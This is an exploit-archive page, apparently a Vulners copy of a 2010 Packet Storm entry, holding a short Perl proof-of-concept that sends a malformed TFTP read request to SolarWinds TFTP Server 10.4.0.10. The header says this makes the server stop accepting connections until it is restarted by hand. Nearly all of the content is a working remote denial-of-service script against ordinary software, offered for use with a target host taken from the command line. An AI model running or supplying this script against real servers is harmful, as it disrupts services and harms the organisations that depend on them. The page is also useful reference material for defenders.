Lucene search
K

Solarwinds TFTP Denial Of Service

🗓️ 22 May 2010 00:00:00Reported by nullthreatType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Remote Denial of Service attack on Solarwinds TFTP Server version 10.4.0.1

Code
`  
  
# Exploit Title: Solarwinds TFTP DOS  
# Date: 5-21-2010  
# Author: Nullthreat  
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx  
# Version: 10.4.0.10  
# Tested on: Windows XP SP3  
# Code :   
  
#!/usr/bin/perl  
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit  
# by Nullthreat  
# The application will not crash, but it will stop accepting connections.  
# You will be forced to restart the server by hand in the config  
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k  
  
use IO::Socket;  
$port = "69";  
$host = $ARGV[0];  
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');  
  
$really=  
"\x00\x01". # Opcode 1 = Read Request  
"\x01". # The crash....no really thats it  
"\x00". # Null byte  
"NETASCII". # The mode  
"\x00"; # Null byte  
$s->send($really);  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation